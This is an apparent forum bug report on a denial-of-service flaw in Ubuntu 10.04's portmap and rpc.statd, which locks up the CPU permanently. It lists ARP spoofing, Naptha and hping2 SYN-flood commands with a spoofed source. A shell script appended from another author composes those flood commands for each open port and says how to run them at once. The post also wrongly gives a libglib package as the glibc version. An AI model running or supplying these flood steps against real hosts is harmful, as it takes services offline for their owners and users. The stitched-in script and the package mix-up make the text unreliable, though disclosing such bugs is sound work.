I’m investigating a Permanent CPU DoS resulting from a TCP flood attack against the TCP ports bound to the Portmap and RPC.STATD services in Ubuntu 10.04. I’ve found a similar issue on RedHat and it appears the vulnerability/bug is in glibc (https://bugzilla.redhat.com/show_bug.cgi?id=702300). However, I wasn't able to find a similar bug in Ubuntu. The cause may be different, but it appears similar.
The glibc version installed on my Ubuntu 10.04 server is “libglib2.0-0 2.24.1-0ubuntu1”.
To reproduce, download the following tools from the internet and execute the following commands:
1. arpspoof -i eth1 -t <ubuntu-ip-address> <source-spoof-ip-addr>
2. srvr -SAa -i eth1 <source-spoof-ip-addr> [srvr is part of the Naptha tool]
3. hping2 <ubuntu-ip-address> -p <port-number> -S -a <source-spoof-ip-addr> -i u10000 -q
Note: port number is 111 for portmap and the port dynamically bound to rpc.statd (via netstat -lnup | grep rpc.statd)
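As an added helper for the reproduction steps above (this is example code, not part of the original post or of the Naptha/hping tools), the script below finds the port rpc.statd has bound from netstat output and composes the three commands per target port, since rpc.statd's port changes on every start while portmap's is fixed at 111. Assumptions: the function names are hypothetical, the netstat listing is constructed rather than captured, and it is filtered on TCP listeners (`netstat -lntp` format) because the flood is a TCP SYN flood; the spoofed source must be on the same segment as the target for the arpspoof/srvr steps to work, which the script does not check.

```sh
#!/bin/sh
# Added example, not from the original post. Builds the reproduction
# command lines; it does not send any packets itself.

# Constructed sample of `netstat -lntp` output. The rpc.statd port (50167)
# is illustrative: it is assigned dynamically each time the daemon starts.
SAMPLE_NETSTAT='Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:111             0.0.0.0:*               LISTEN      651/portmap
tcp        0      0 0.0.0.0:50167           0.0.0.0:*               LISTEN      672/rpc.statd
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      904/sshd
tcp6       0      0 :::22                   :::*                    LISTEN      904/sshd'

# rpc_listen_ports PROG: read netstat -lntp output on stdin and print the
# TCP ports PROG is listening on, one per line. Handles both "0.0.0.0:PORT"
# and IPv6 ":::PORT" local-address forms by taking the last colon field.
rpc_listen_ports() {
    awk -v prog="$1" '
        $1 ~ /^tcp/ && $NF ~ ("/" prog "$") {
            n = split($4, a, ":"); print a[n]
        }' | sort -u
}

# valid_ipv4 ADDR: succeed only for a dotted quad with each octet 0..255,
# so a typo in the target or spoof address is caught before commands are built.
valid_ipv4() {
    printf '%s' "$1" | awk -F. '
        NF == 4 {
            for (i = 1; i <= 4; i++)
                if ($i !~ /^[0-9]+$/ || $i > 255) exit 1
            exit 0
        }
        { exit 1 }'
}

# hping_syn_flood_cmd TARGET PORT SPOOF: step 3 of the post for one port.
# -S sets SYN, -a spoofs the source, -i u10000 sends one packet every
# 10000 microseconds, -q keeps hping2 quiet.
hping_syn_flood_cmd() {
    printf 'hping2 %s -p %s -S -a %s -i u10000 -q\n' "$1" "$2" "$3"
}

# repro_commands IFACE TARGET SPOOF: read netstat -lntp output on stdin and
# print all three steps, with step 3 repeated for portmap (111) and every
# TCP port rpc.statd has bound. Fails without output on a bad address.
repro_commands() {
    iface="$1"; target="$2"; spoof="$3"
    valid_ipv4 "$target" && valid_ipv4 "$spoof" || return 1
    printf 'arpspoof -i %s -t %s %s\n' "$iface" "$target" "$spoof"
    printf 'srvr -SAa -i %s %s\n' "$iface" "$spoof"
    { echo 111; rpc_listen_ports rpc.statd; } | sort -un | while read -r port; do
        hping_syn_flood_cmd "$target" "$port" "$spoof"
    done
}

# Usage against a live host (addresses are placeholders):
#   netstat -lntp | sh -c '. ./repro.sh; repro_commands eth1 <ubuntu-ip> <spoof-ip>'
# Demo on the constructed listing:
printf '%s\n' "$SAMPLE_NETSTAT" | repro_commands eth1 192.0.2.10 192.0.2.99
```

Each hping2 line has to run in its own terminal (or backgrounded) so that portmap and rpc.statd are flooded at the same time; the arpspoof and srvr steps must already be running, otherwise the target's SYN-ACKs to the spoofed address get no ACK and the connections never complete.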